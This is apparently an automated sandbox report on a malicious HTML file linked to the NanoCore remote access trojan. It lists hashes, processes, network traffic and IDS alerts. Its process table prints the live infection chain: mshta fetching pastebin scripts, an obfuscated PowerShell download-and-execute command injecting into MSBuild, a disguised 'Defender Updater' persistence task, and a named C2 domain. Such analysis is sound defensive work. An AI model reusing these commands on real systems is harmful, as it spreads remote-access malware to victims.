download: | 8.html |
Full analysis: | https://app.any.run/tasks/1ca27cb5-dc96-4f73-b460-3dab8cd87684 |
Verdict: | Malicious activity |
Threats: | NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. |
Analysis date: | July 11, 2019, 14:16:07 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/html |
File info: | HTML document, ASCII text, with very long lines |
MD5: | 6E9C135A194306432C54952A5EDA2A6E |
SHA1: | 38D91D48F050F925CB33F8A259CBFB15EAFC89C3 |
SHA256: | 1649D105A7A5C3AD68A16D1BD6C21B36E30273A3B9F7FC25E9747D31EF98DE85 |
SSDEEP: | 768:7+3eyHHvPWdoV20rOwHBgFhoCiote2SeAIk:7+3LHH2dw20r3HBjCiotdk |
.html | | | HyperText Markup Language (100) |
---|
Title: | .: 8 thomas 7.10 |
---|---|
Rating: | adult |
Generator: | blogger |
ContentType: | text/html; charset=UTF-8 |
viewport: | width=1100 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3952 | "C:\Windows\System32\mshta.exe" https://asdadwnixwed.blogspot.com/p/8.html | C:\Windows\System32\mshta.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2632 | "C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/LhpqPv66 | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3416 | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3720 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,87,87,87,113,49,100,83,49,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,75,121,54,113,118,80,87,103,39,41,46,114,101,112,108,97,99,101,40,39,42,42,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEX | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4060 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Defender Updater" /tr "mshta.exe http://pastebin.com/raw/b9u9sm5U" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1144 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3444 | taskkill /f /im excel.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3328 | taskkill /f /im MSPUB.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3508 | taskkill /f /im POWERPNT.EXE | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2104 | "{path}" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Version: 2.0.50727.5420 built by: Win7SP1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\error[1] | — | |
MD5:— | SHA256:— | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\warning[1] | — | |
MD5:— | SHA256:— | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js | html | |
MD5:5C7A692DB43DD1E7299DB0274A7559E9 | SHA256:941A23DB972131DDE66171968F6B847416DFE037E9F3A143F2B9C729B41A625C | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js | html | |
MD5:9EE08AD2448D931C3350F8EFB31B9583 | SHA256:045A89DA56E925603D6AE87BD25C68A06487B706CB75CD41138614995118D32E | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\8[1].html | html | |
MD5:5D9434C53DE484260E658001E71DF812 | SHA256:A1950F682E83AF4B3A5AD6E0A46FA9EC3B4F331D4748180E2A4165A3C6C9E432 | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cb=gapi[1].loaded_0 | text | |
MD5:BFA01245364B163772BFA3067C5DD6C3 | SHA256:E15C2B291BA23BB646CA27E52853B1FB305B60E1EF40C51530B8A2B18BDCFF82 | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\cb=gapi[1].loaded_3 | text | |
MD5:5C2B6131B59B6397A81F1ED46BA585FE | SHA256:A2996100C95E3166C48C9CAB4F56485C23EFFF0DDE1DD4E51069203D4A3BC58A | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_2 | text | |
MD5:DFCA983F4B2AFD0472667416B99E0F9A | SHA256:B88D9432A00CFA0D6CFDC1F55AD27E75B029B638075C68E1DE32EB5A5DC0B943 | |||
3952 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\navbar[1].g | — | |
MD5:— | SHA256:— | |||
3720 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LZY4SIKB9W7NO2CS8I4D.temp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2632 | mshta.exe | GET | 301 | 104.20.208.21:80 | http://www.pastebin.com/raw/LhpqPv66 | US | html | 17.7 Kb | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3952 | mshta.exe | 172.217.21.206:443 | apis.google.com | Google Inc. | US | whitelisted |
3952 | mshta.exe | 172.217.16.162:443 | pagead2.googlesyndication.com | Google Inc. | US | whitelisted |
3952 | mshta.exe | 172.217.21.233:443 | www.blogger.com | Google Inc. | US | whitelisted |
3952 | mshta.exe | 216.58.210.9:443 | resources.blogblog.com | Google Inc. | US | whitelisted |
3952 | mshta.exe | 172.217.16.173:443 | accounts.google.com | Google Inc. | US | whitelisted |
3952 | mshta.exe | 172.217.23.129:443 | asdadwnixwed.blogspot.com | Google Inc. | US | whitelisted |
3952 | mshta.exe | 172.217.18.99:443 | www.gstatic.com | Google Inc. | US | whitelisted |
2104 | MSBuild.exe | 8.8.8.8:53 | — | Google Inc. | US | whitelisted |
2632 | mshta.exe | 104.20.209.21:443 | www.pastebin.com | Cloudflare Inc | US | shared |
2632 | mshta.exe | 104.20.208.21:80 | www.pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
asdadwnixwed.blogspot.com |
| whitelisted |
www.blogger.com |
| shared |
apis.google.com |
| whitelisted |
pagead2.googlesyndication.com |
| whitelisted |
resources.blogblog.com |
| whitelisted |
accounts.google.com |
| shared |
www.gstatic.com |
| whitelisted |
www.pastebin.com |
| shared |
pastebin.com |
| shared |
officewk.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2632 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
2104 | MSBuild.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |